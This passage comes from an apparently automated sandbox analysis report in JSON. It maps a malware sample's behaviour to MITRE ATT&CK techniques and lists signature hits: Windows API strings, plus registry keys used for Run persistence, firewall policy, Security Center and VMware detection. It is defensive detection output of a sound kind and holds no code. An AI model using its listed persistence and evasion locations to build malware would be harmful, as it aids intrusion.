"ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"26167301513,5024,3182,,ShellExecuteA,Shell32.dll,\"252:22:03.832\",RX=0,PX=0\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005056.00000001.140381.006A5000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Connect\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Internet Explorer\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Kazaa\\UserDetails\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Software\\Microsoft\\Connect\" in Source: 00000000-00005056.00000000.139963.0041A000.00000040.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00005056.00000000.139963.00423000.00000040.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005056.00000000.139963.00640000.00000004.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005068.00000000.140099.00270000.00000004.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00005068.00000000.140099.00423000.00000040.mdmp\n 00000000-00005068.00000001.140461.00423000.00000040.mdmp\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Kazaa\\UserDetails\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00005392.00000000.140409.00423000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenProcessToken\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CloseEventLog\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenEventLogA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ControlService\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"DeleteService\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenServiceA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetHandleCount\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: 